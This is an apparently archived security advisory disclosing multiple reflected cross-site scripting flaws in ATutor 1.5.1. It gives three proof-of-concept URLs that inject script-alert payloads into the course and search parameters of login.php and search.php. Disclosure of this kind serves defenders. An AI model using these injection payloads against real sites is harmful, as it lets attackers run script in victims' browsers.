ATutor versions 1.5.1 and below suffer from multiple cross site scripting vulnerabilities.
869801226e9bcdc2cc692bfc990f0ea98c7e523d823a4ecaad62ab6788d32e76ATutor 1.5.1 and prior multiple XSS Vulnerabilities
SEVERITY:
=========
Medium
SOFTWARE:
=========
ATutor 1.5.1
http://www.atutor.ca/
INFO:
=====
ATutor 1.5.1 is a web based education portal.
DESCRIPTION:
============
The system is vulnerable to various XSS attacks:
--==XSS==--
Some examples -
http://localhost/tour/login.php?course="><script>alert('Matrix_Killer
r0X');</script>
http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There
is no other place like
127.0.0.1');</script>&include=all&find_in=all&display_as=pages
http://localhost/tour/search.php?search=1&words="><script>alert('Found
By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
VENDOR STATUS:
==============
Vendor was contacted but no response received till date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2094
--
http://www.h4cky0u.org
(In)Security at its best...
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed